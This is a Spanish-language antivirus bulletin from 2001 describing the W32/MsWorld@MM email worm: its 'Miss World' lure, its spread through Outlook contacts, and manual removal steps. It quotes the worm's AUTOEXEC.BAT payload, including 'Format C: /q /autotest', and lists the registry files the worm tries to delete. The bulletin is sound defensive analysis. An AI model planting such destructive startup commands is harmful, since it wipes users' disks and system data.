| |
VSantivirus No. 333 - Año 5 - Miércoles 6 de junio de 2001
Nombre: W32/MsWorld@MM
Tipo: Gusano de Internet
Alias: W32.MsWorld@mm
Fecha: 5/jun/01
Tamaño: 131,072 bytes
Este gusano, con características destructivas, ya que pretende borrar el registro de Windows y formatear la unidad de disco duro, es capaz de enviarse masivamente a través del correo electrónico, a través del cuál se propaga con la apariencia de una inocente presentación de Macromedia Flash.
El mensaje en el que puede arribar a nuestra computadora, hace referencia a supuestas imágenes de Miss Mundo:
Asunto: Miss World
Texto:
Hi, [nombre del destinatario]
Enjoy the latest pictures of Miss World from various Country
Archivo adjunto: MWrld.exe (o MissWorld.exe)
 |
Si el adjunto es abierto, se nos presenta una ventana típica de una presentación realizada con la utilidad Macromedia Flash, conteniendo la imagen de una caricatura con fondo rosa, y una gran torta de cumpleaños, y al pie, el siguiente texto:
I fall more in love with you each day!
©AGC, Inc.
[ Start ]
|
Luego de esto, el gusano comienza a enviarse a todos los contactos de la libreta de direcciones del Microsoft Outlook.
También agrega al archivo AUTOXEC.BAT, las instrucciones para formatear la unidad de disco C en el próximo reinicio de Windows:
Echo Off
Echo "This Everything for my Girl Friend...., (CatEyes, KRSSL, SS Hostel)"
Format C: /q /autotest
Echo On
Finalmente, el virus intenta borra los archivos que contienen el registro de Windows y sus respaldos:
C:\Windows\USER.DAT
C:\Windows\SYSTEM.DAT
C:\Windows\USER.DA0
C:\Windows\SYSTEM.DA0
Cómo los dos primeros están en uso, el virus no los borra, pero muestra un mensaje de error en tiempo de ejecución
(RUN-TIME ERROR). Son borrados solo los dos últimos (.DA0) que contienen el respaldo del registro.
Cómo remover el virus de un sistema infectado
Para eliminar manualmente este virus, ejecute primero uno o más antivirus al día. Luego borre el archivo
MISSWORLD.EXE (o MWRLD.EXE), y las entradas al archivo
AUTOEXEC.BAT, siguiendo estos pasos.
1. Pinche en Inicio, Buscar, Archivos o carpetas.
2. Asegúrese de tener en "Buscar en:" la unidad C:\ y marcado "Incluir subcarpetas".
3. En la casilla "Nombre" escriba (o "corte y pegue") los siguientes nombres:
MissWorld.exe, MWrld.exe
4. Pinche en "Buscar ahora".
5. Si aparece alguno de estos archivos, márquelo.
6. Pulse la tecla SUPR o DEL, y pinche en SI para confirmar el borrado.
7. Vaya a la papelera de reciclaje en el escritorio, pinche con el botón derecho sobre ella y seleccione "Vaciar la papelera de reciclaje".
8. Desde Inicio, Ejecutar, teclee EDIT C:\AUTOEXEC.BAT y Enter
9. Busque la línea que contenga estas instrucciones y borre la línea entera:
Format C: /q /autotest
También puede borrar esta línea:
Echo "This Everything for my Girl Friend......, [etc.]
10. Seleccione Archivo, Salir y conteste afirmativamente cuando se le pida guardar las modificaciones.
Nota: En Windows Me la modificación al archivo AUTOEXEC.BAT no se cumplirá por las características del sistema. Tampoco el borrado de los archivos
USER.DA0 y SYSTEM.DA0 porque no existen.
Fuentes: Symantec, Network Associates
(c) Video Soft - http://www.videosoft.net.uy
|
|
